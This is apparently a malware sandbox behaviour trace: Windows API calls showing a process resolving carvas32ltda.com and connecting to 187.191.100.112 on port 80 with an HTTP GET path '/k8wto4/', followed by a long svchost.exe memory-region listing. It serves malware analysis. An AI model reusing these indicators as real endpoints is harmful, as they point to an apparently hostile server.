[0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="/k8wto4/", cchCount1=1, lpString2="/", cchCount2=1) returned 2 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="TRACE", cchCount2=5) returned 1 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="PUT", cchCount2=3) returned 1 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="OPTIONS", cchCount2=7) returned 1 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="GET", cchCount1=3, lpString2="DELETE", cchCount2=6) returned 3 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="TRACE", cchCount2=5) returned 1 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="PUT", cchCount2=3) returned 1 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="OPTIONS", cchCount2=7) returned 1 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="DELETE", cchCount2=6) returned 1 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="http", cchCount2=4) returned 2 [0221.742] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="carvas32ltda.com", cchCount2=16) returned 1 [0221.743] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="http", cchCount1=4, lpString2="HTTPS", cchCount2=5) returned 1 [0221.743] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x68ff381, cbMultiByte=255, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="û\x09", lpUsedDefaultChar=0x0) returned 0 [0221.743] socket (af=2, type=1, protocol=0) returned 0x708 [0221.743] getsockopt (in: s=0x708, level=65535, optname=4104, optval=0x68ff448, optlen=0x68ff444 | out: optval="\x01", optlen=0x68ff444) returned 0 [0221.743] getsockopt (in: s=0x708, level=6, optname=1, optval=0x68ff448, optlen=0x68ff444 | out: optval="", optlen=0x68ff444) returned 0 [0221.743] setsockopt (s=0x708, level=65535, optname=4, optval="", optlen=4) returned 0 [0221.743] htons (hostshort=0x0) returned 0x0 [0221.743] bind (s=0x708, addr=0x68ff3a8*(sa_family=2, sin_port=0x0, sin_addr="0.0.0.0"), namelen=16) returned 0 [0221.743] getsockname (in: s=0x708, name=0x68ff39c, namelen=0x68ff41c | out: name=0x68ff39c*(sa_family=2, sin_port=0xc011, sin_addr="0.0.0.0"), namelen=0x68ff41c) returned 0 [0221.744] htons (hostshort=0x11c0) returned 0xc011 [0221.744] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="carvas32ltda.com", cchCount1=16, lpString2="LOCALHOST", cchCount2=9) returned 1 [0221.744] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carvas32ltda.com", cchUnicodeChar=16, lpASCIICharStr=0x0, cchASCIIChar=0 | out: lpASCIICharStr=0x0) returned 16 [0221.744] IdnToAscii (in: dwFlags=0x0, lpUnicodeCharStr="carvas32ltda.com", cchUnicodeChar=16, lpASCIICharStr=0x71fc79c, cchASCIIChar=16 | out: lpASCIICharStr="carvas32ltda.com") returned 16 [0221.744] GetAddrInfoW (in: pNodeName="carvas32ltda.com", pServiceName=0x0, pHints=0x68ff450, ppResult=0x68ff470 | out: ppResult=0x68ff470) returned 0 [0222.953] FreeAddrInfoW (pAddrInfo=0x300a600) [0222.953] htons (hostshort=0x50) returned 0x5000 [0222.953] connect (s=0x708, name=0x68ff400*(sa_family=2, sin_port=0x50, sin_addr="187.191.100.112"), namelen=16) Thread: id = 52 os_tid = 0xc28 [0071.532] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0xbbb50 Thread: id = 53 os_tid = 0xcac [0095.166] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x135db0 [0095.172] LocalFree (hMem=0x135db0) returned 0x0 Thread: id = 81 os_tid = 0xf00 [0221.580] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x2fca7b0 [0221.580] LocalAlloc (uFlags=0x40, uBytes=0x40) returned 0x2f407f8 [0221.580] LoadStringW (in: hInstance=0x6ba0000, uID=0xffcb, lpBuffer=0x342dd38, cchBufferMax=4096 | out: lpBuffer="Abstract Error") returned 0xe [0221.580] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x342fd48) [0221.580] RtlUnwind (TargetFrame=0x342fd70, TargetIp=0x6ba8130, ExceptionRecord=0x342f86c, ReturnValue=0x0) [0221.580] SetEvent (hEvent=0xb2c) returned 1 [0221.580] GetCurrentThreadId () returned 0xf00 [0221.580] GetCurrentThreadId () returned 0xf00 [0221.580] GetCurrentThreadId () returned 0xf00 [0221.580] CloseHandle (hObject=0x944) returned 1 [0221.580] RtlExitUserThread (Status=0x0) [0221.580] LocalFree (hMem=0x2fca7b0) returned 0x0 Thread: id = 94 os_tid = 0xf7c [0224.377] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x2fca630 Thread: id = 101 os_tid = 0x48c [0226.672] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x54b4f48 Thread: id = 102 os_tid = 0x470 [0226.780] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x2fc4c08 Process: id = "4" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x7f09e160" os_pid = "0x2b8" monitor_reason = "rpc_server" parent_id = "3" os_parent_pid = "0x4f0" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" Region: id = 681 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 682 start_va = 0x20000 end_va = 0x26fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 683 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 684 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 685 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" Region: id = 686 start_va = 0xc0000 end_va = 0x13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 687 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 688 start_va = 0x150000 end_va = 0x151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 689 start_va = 0x160000 end_va = 0x160fff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 690 start_va = 0x170000 end_va = 0x170fff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 691 start_va = 0x180000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 692 start_va = 0x1c0000 end_va = 0x287fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 693 start_va = 0x290000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 694 start_va = 0x2b0000 end_va = 0x2b7fff entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 695 start_va = 0x2c0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000002c0000" filename = "" Region: id = 696 start_va = 0x2e0000 end_va = 0x2fffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 697 start_va = 0x300000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = "private_0x0000000000300000" filename = "" Region: id = 698 start_va = 0x320000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 699 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 700 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Region: id = 701 start_va = 0x570000 end_va = 0x962fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 702 start_va = 0x970000 end_va = 0x970fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000970000" filename = "" Region: id = 703 start_va = 0x980000 end_va = 0x9bffff entry_point = 0x0 region_type = private name = "private_0x0000000000980000" filename = "" Region: id = 704 start_va = 0x9c0000 end_va = 0x9c0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009c0000" filename = "" Region: id = 705 start_va = 0x9d0000 end_va = 0xa0ffff entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 706 start_va = 0xa10000 end_va = 0xa50fff entry_point = 0xa2388a region_type = mapped_file name = "services.exe" filename = "\\Windows\\System32\\services.exe" Region: id = 707 start_va = 0xa60000 end_va = 0xa60fff entry_point = 0x0 region_type = private name = "private_0x0000000000a60000" filename = "" Region: id = 708 start_va = 0xa70000 end_va = 0xa70fff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id = 709 start_va = 0xa80000 end_va = 0xa80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a80000" filename = "" Region: id = 710 start_va = 0xa90000 end_va = 0xa91fff entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 711 start_va = 0xaa0000 end_va = 0xaa2fff entry_point = 0xaa0000 region_type = mapped_file name = "WinMgmtR.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" Region: id = 712 start_va = 0xab0000 end_va = 0xab1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ab0000" filename = "" Region: id = 713 start_va = 0xac0000 end_va = 0xac0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 714 start_va = 0xad0000 end_va = 0xad0fff entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 715 start_va = 0xb00000 end_va = 0xb3ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 716 start_va = 0xb60000 end_va = 0xc5ffff entry_point = 0x0 region_type = private name = "private_0x0000000000b60000" filename = "" Region: id = 717 start_va = 0xc80000 end_va = 0xcbffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 718 start_va = 0xce0000 end_va = 0xd1ffff entry_point = 0x0 region_type = private name = "private_0x0000000000ce0000" filename = "" Region: id = 719 start_va = 0xd50000 end_va = 0xd8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000d50000" filename = "" Region: id = 720 start_va = 0xde0000 end_va = 0xde7fff entry_point = 0xde2104 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" Region: id = 721 start_va = 0xdf0000 end_va = 0x10befff entry_point = 0xdf0000 region_type = mapped_file name = "SortDefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" Region: id = 722 start_va = 0x10c0000 end_va = 0x1107fff entry_point = 0x10d123b region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" Region: id = 723 start_va = 0x1110000 end_va = 0x114ffff entry_point = 0x0 region_type = private name = "private_0x0000000001110000" filename = "" Region: id = 724 start_va = 0x1160000 end_va = 0x119ffff entry_point = 0x0 region_type = private name = "private_0x0000000001160000" filename = "" Region: id = 725 start_va = 0x11c0000 end_va = 0x11fffff entry_point = 0x0 region_type = private name = "private_0x00000000011c0000" filename = "" Region: id = 726 start_va = 0x1200000 end_va = 0x12fffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 727 start_va = 0x1300000 end_va = 0x1347fff entry_point = 0x131123b region_type = mapped_file name = "winlogon.exe" filename = "\\Windows\\System32\\winlogon.exe" Region: id = 728 start_va = 0x1350000 end_va = 0x138ffff entry_point = 0x0 region_type = private name = "private_0x0000000001350000" filename = "" Region: id = 729 start_va = 0x13b0000 end_va = 0x13effff entry_point = 0x0 region_type = private name = "private_0x00000000013b0000" filename = "" Region: id = 730 start_va = 0x1460000 end_va = 0x149ffff entry_point = 0x0 region_type = private name = "private_0x0000000001460000" filename = "" Region: id = 731 start_va = 0x14c0000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x00000000014c0000" filename = "" Region: id = 732 start_va = 0x1500000 end_va = 0x15fffff entry_point = 0x0 region_type = private name = "private_0x0000000001500000" filename = "" Region: id = 733 start_va = 0x1610000 end_va = 0x164ffff entry_point = 0x0 region_type = private name = "private_0x0000000001610000" filename = "" Region: id = 734 start_va = 0x1690000 end_va = 0x16cffff entry_point = 0x0 region_type = private name = "private_0x0000000001690000" filename = "" Region: id = 735 start_va = 0x1730000 end_va = 0x176ffff entry_point = 0x0 region_type = private name = "private_0x0000000001730000" filename = "" Region: id = 736 start_va = 0x1770000 end_va = 0x196ffff entry_point = 0x0 region_type = private name = "private_0x0000000001770000" filename = "" Region: id = 737 start_va = 0x1970000 end_va = 0x19affff entry_point = 0x0 region_type = private name = "private_0x0000000001970000" filename = "" Region: id = 738 start_va = 0x1a20000 end_va = 0x1a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a20000" filename = "" Region: id = 739 start_va = 0x1a60000 end_va = 0x1a9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001a60000" filename = "" Region: id = 740 start_va = 0x1aa0000 end_va = 0x1adffff entry_point = 0x0 region_type = private name = "private_0x0000000001aa0000" filename = "" Region: id = 741 start_va = 0x1ae0000 end_va = 0x1ee1fff entry_point = 0x0 region_type = private name = "private_0x0000000001ae0000" filename = "" Region: id = 742 start_va = 0x1ef0000 end_va = 0x22effff entry_point = 0x0 region_type = private name = "private_0x0000000001ef0000" filename = "" Region: id = 743 start_va = 0x22f0000 end_va = 0x236ffff entry_point = 0x0 region_type = private name = "private_0x00000000022f0000" filename = "" Region: id = 744 start_va = 0x2530000 end_va = 0x256ffff entry_point = 0x0 region_type = private name = "private_0x0000000002530000" filename = "" Region: id = 745 start_va = 0x2590000 end_va = 0x25cffff entry_point = 0x0 region_type = private name = "private_0x0000000002590000" filename = "" Region: id = 746 start_va = 0x6d2e0000 end_va = 0x6d36bfff entry_point = 0x6d2e5776 region_type = mapped_file name = "wuapi.dll" filename = "\\Windows\\System32\\wuapi.dll" Region: id = 747 start_va = 0x6d370000 end_va = 0x6d45afff entry_point = 0x6d3713ce region_type = mapped_file name = "dbghelp.dll" filename = "\\Windows\\System32\\dbghelp.dll" Region: id = 748 start_va = 0x6dc70000 end_va = 0x6dc84fff entry_point = 0x6dc711fa region_type = mapped_file name = "cabinet.dll" filename = "\\Windows\\System32\\cabinet.dll" Region: id = 749 start_va = 0x6fb80000 end_va = 0x6fb93fff entry_point = 0x6fb81340 region_type = mapped_file name = "wscsvc.dll" filename = "\\Windows\\System32\\wscsvc.dll" Region: id = 750 start_va = 0x70e70000 end_va = 0x70ea5fff entry_point = 0x70e79dae region_type = mapped_file name = "AudioSes.dll" filename = "\\Windows\\System32\\AudioSes.dll" Region: id = 751 start_va = 0x72100000 end_va = 0x72111fff entry_point = 0x72103271 region_type = mapped_file name = "dhcpcsvc.dll" filename = "\\Windows\\System32\\dhcpcsvc.dll" Region: id = 752 start_va = 0x72120000 end_va = 0x7212cfff entry_point = 0x72122012 region_type = mapped_file name = "dhcpcsvc6.dll" filename = "\\Windows\\System32\\dhcpcsvc6.dll" Region: id = 753 start_va = 0x72250000 end_va = 0x72280fff entry_point = 0x722552b6 region_type = mapped_file name = "dhcpcore6.dll" filename = "\\Windows\\System32\\dhcpcore6.dll" Region: id = 754 start_va = 0x72290000 end_va = 0x722cffff entry_point = 0x7229feee region_type = mapped_file name = "dhcpcore.dll" filename = "\\Windows\\System32\\dhcpcore.dll" Region: id = 755 start_va = 0x722e0000 end_va = 0x722e5fff entry_point = 0x722e1155 region_type = mapped_file name = "nrpsrv.dll" filename = "\\Windows\\System32\\nrpsrv.dll" Region: id = 756 start_va = 0x722f0000 end_va = 0x722f7fff entry_point = 0x722f1f2a region_type = mapped_file name = "lmhsvc.dll" filename = "\\Windows\\System32\\lmhsvc.dll" Region: id = 757 start_va = 0x72300000 end_va = 0x72306fff entry_point = 0x7230128d region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" Region: id = 758 start_va = 0x72310000 end_va = 0x7232bfff entry_point = 0x7231a431 region_type = mapped_file name = "IPHLPAPI.DLL" filename = "\\Windows\\System32\\IPHLPAPI.DLL" Region: id = 759 start_va = 0x72360000 end_va = 0x72362fff entry_point = 0x72360000 region_type = mapped_file name = "WinMgmtR.dll" filename = "\\Windows\\System32\\wbem\\WinMgmtR.dll" Region: id = 760 start_va = 0x72460000 end_va = 0x7246efff entry_point = 0x724621a0 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" Region: id = 761 start_va = 0x72e00000 end_va = 0x72e09fff entry_point = 0x72e0149a region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" Region: id = 762 start_va = 0x72e10000 end_va = 0x72e27fff entry_point = 0x72e11335 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" Region: id = 763 start_va = 0x72e30000 end_va = 0x72ec5fff entry_point = 0x72e4f8b9 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" Region: id = 764 start_va = 0x73020000 end_va = 0x7307bfff entry_point = 0x73042b48 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" Region: id = 765 start_va = 0x74590000 end_va = 0x74596fff entry_point = 0x745910c0 region_type = mapped_file name = "avrt.dll" filename = "\\Windows\\System32\\avrt.dll" Region: id = 766 start_va = 0x745a0000 end_va = 0x74694fff entry_point = 0x745b0d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" Region: id = 767 start_va = 0x746a0000 end_va = 0x746d8fff entry_point = 0x746ae2de region_type = mapped_file name = "MMDevAPI.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" Region: id = 768 start_va = 0x746e0000 end_va = 0x74704fff entry_point = 0x746e2b71 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" Region: id = 769 start_va = 0x74710000 end_va = 0x74789fff entry_point = 0x74724540 region_type = mapped_file name = "audiosrv.dll" filename = "\\Windows\\System32\\audiosrv.dll" Region: id = 770 start_va = 0x74790000 end_va = 0x7489bfff entry_point = 0x747972fa region_type = mapped_file name = "wevtsvc.dll" filename = "\\Windows\\System32\\wevtsvc.dll" Region: id = 771 start_va = 0x748a0000 end_va = 0x748a8fff entry_point = 0x748a1220 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" Region: id = 772 start_va = 0x748b0000 end_va = 0x74925fff entry_point = 0x748b760e region_type = mapped_file name = "FirewallAPI.dll" filename = "\\Windows\\System32\\FirewallAPI.dll" Region: id = 773 start_va = 0x74930000 end_va = 0x74934fff entry_point = 0x749315df region_type = mapped_file name = "WSHTCPIP.DLL" filename = "\\Windows\\System32\\WSHTCPIP.DLL" Region: id = 774 start_va = 0x749e0000 end_va = 0x749f5fff entry_point = 0x749e2061 region_type = mapped_file name = "gpapi.dll" filename = "\\Windows\\System32\\gpapi.dll" Region: id = 775 start_va = 0x74a00000 end_va = 0x74a16fff entry_point = 0x74a01c9d region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" Region: id = 776 start_va = 0x74af0000 end_va = 0x74af7fff entry_point = 0x74af34d3 region_type = mapped_file name = "credssp.dll" filename = "\\Windows\\System32\\credssp.dll" Region: id = 777 start_va = 0x74bc0000 end_va = 0x74bfafff entry_point = 0x74bc128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" Region: id = 778 start_va = 0x74ca0000 end_va = 0x74ce3fff entry_point = 0x74cb63f9 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" Region: id = 779 start_va = 0x74dd0000 end_va = 0x74dd5fff entry_point = 0x74dd1673 region_type = mapped_file name = "wship6.dll" filename = "\\Windows\\System32\\wship6.dll" Region: id = 780 start_va = 0x74de0000 end_va = 0x74e1bfff entry_point = 0x74de145d region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" Region: id = 781 start_va = 0x74e20000 end_va = 0x74e35fff entry_point = 0x74e22dc3 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" Region: id = 782 start_va = 0x74fe0000 end_va = 0x75021fff entry_point = 0x74fe1360 region_type = mapped_file name = "wevtapi.dll" filename = "\\Windows\\System32\\wevtapi.dll" Region: id = 783 start_va = 0x75260000 end_va = 0x75267fff entry_point = 0x752610e9 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" Region: id = 784 start_va = 0x75280000 end_va = 0x7529afff entry_point = 0x752893b9 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" Region: id = 785 start_va = 0x752a0000 end_va = 0x752abfff entry_point = 0x752a10e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" Region: id = 786 start_va = 0x75310000 end_va = 0x75338fff entry_point = 0x75316b19 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" Region: id = 787 start_va = 0x75340000 end_va = 0x7534dfff entry_point = 0x75341235 region_type = mapped_file name = "RpcRtRemote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" Region: id = 788 start_va = 0x75350000 end_va = 0x7535afff entry_point = 0x75351992 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" Region: id = 789 start_va = 0x753c0000 end_va = 0x753cbfff entry_point = 0x753c238e region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" Region: id = 790 start_va = 0x753d0000 end_va = 0x754ecfff entry_point = 0x753d158a region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" Region: id = 791 start_va = 0x754f0000 end_va = 0x75501fff entry_point = 0x754f1441 region_type = mapped_file name = "devobj.dll" filename = "\\Windows\\System32\\devobj.dll" Region: id = 792 start_va = 0x75510000 end_va = 0x75559fff entry_point = 0x75517de0 region_type = mapped_file name = "KernelBase.dll" filename = "\\Windows\\System32\\KernelBase.dll" Region: id = 793 start_va = 0x75560000 end_va = 0x7558cfff entry_point = 0x7556296d region_type = mapped_file name = "wintrust.dll" filename = "\\Windows\\System32\\wintrust.dll" Region: id = 794 start_va = 0x75590000 end_va = 0x755b6fff entry_point = 0x755958b9 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" Region: id = 795 start_va = 0x75830000 end_va = 0x758fbfff entry_point = 0x7583168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" Region: id = 796 start_va = 0x75900000 end_va = 0x759d3fff entry_point = 0x7594bde4 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" Region: id = 797 start_va = 0x76630000 end_va = 0x7664efff entry_point = 0x76631355 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" Region: id = 798 start_va = 0x76650000 end_va = 0x766effff entry_point = 0x766649e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" Region: id = 799 start_va = 0x766f0000 end_va = 0x7688cfff entry_point = 0x766f17e7 region_type = mapped_file name = "setupapi.dll" filename = "\\Windows\\System32\\setupapi.dll" Region: id = 800 start_va = 0x76a90000 end_va = 0x76bebfff entry_point = 0x76adba3d region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" Region: id = 801 start_va = 0x76bf0000 end_va = 0x76c90fff entry_point = 0x76c22433 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" Region: id = 802 start_va = 0x76ca0000 end_va = 0x76d68fff entry_point = 0x76cbd711 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" Region: id = 803 start_va = 0x76d70000 end_va = 0x76dc6fff entry_point = 0x76d89ba6 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" Region: id = 804 start_va = 0x76dd0000 end_va = 0x76e1dfff entry_point = 0x76dd9c09 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" Region: id = 805 start_va = 0x76e20000 end_va = 0x76ea2fff entry_point = 0x76e223d2 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" Region: id = 806 start_va = 0x76ee0000 end_va = 0x76f6efff entry_point = 0x76ee3fb1 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" Region: id = 807 start_va = 0x76f70000 end_va = 0x7701bfff entry_point = 0x76f7a472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" Region: id = 808 start_va = 0x77020000 end_va = 0x770bcfff entry_point = 0x77053fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" Region: id = 809 start_va = 0x77200000 end_va = 0x7733bfff entry_point = 0x77200000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" Region: id = 810 start_va = 0x77340000 end_va = 0x77345fff entry_point = 0x77341782 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" Region: id = 811 start_va = 0x77350000 end_va = 0x77359fff entry_point = 0x7735136c region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" Region: id = 812 start_va = 0x773d0000 end_va = 0x773e8fff entry_point = 0x773d4975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" Region: id = 813 start_va = 0x773f0000 end_va = 0x77424fff entry_point = 0x773f145d region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" Region: id = 814 start_va = 0x77440000 end_va = 0x77440fff entry_point = 0x77440000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" Region: id = 815 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 816 start_va = 0x7ffa6000 end_va = 0x7ffa6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa6000" filename = "" Region: id = 817 start_va = 0x7ffa7000 end_va = 0x7ffa7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa7000" filename = "" Region: id = 818 start_va = 0x7ffa9000 end_va = 0x7ffa9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffa9000" filename = "" Region: id = 819 start_va = 0x7ffaa000 end_va = 0x7ffaafff entry_point = 0x0 region_type = private name = "private_0x000000007ffaa000" filename = "" Region: id = 820 start_va = 0x7ffab000 end_va = 0x7ffabfff entry_point = 0x0 region_type = private name = "private_0x000000007ffab000" filename = "" Region: id = 821 start_va = 0x7ffac000 end_va = 0x7ffacfff entry_point = 0x0 region_type = private name = "private_0x000000007ffac000" filename = "" Region: id = 822 start_va = 0x7ffad000 end_va = 0x7ffadfff entry_point = 0x0 region_type = private name = "private_0x000000007ffad000" filename = "" Region: id = 823 start_va = 0x7ffae000 end_va = 0x7ffaefff entry_point = 0x0 region_type = private name = "private_0x000000007ffae000" filename = "" Region: id = 824 start_va = 0x7ffaf000 end_va = 0x7ffaffff entry_point = 0x0 region_type = private name = "private_0x000000007ffaf000" filename = "" Region: id = 825 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 826 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 827 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 828 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 829 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 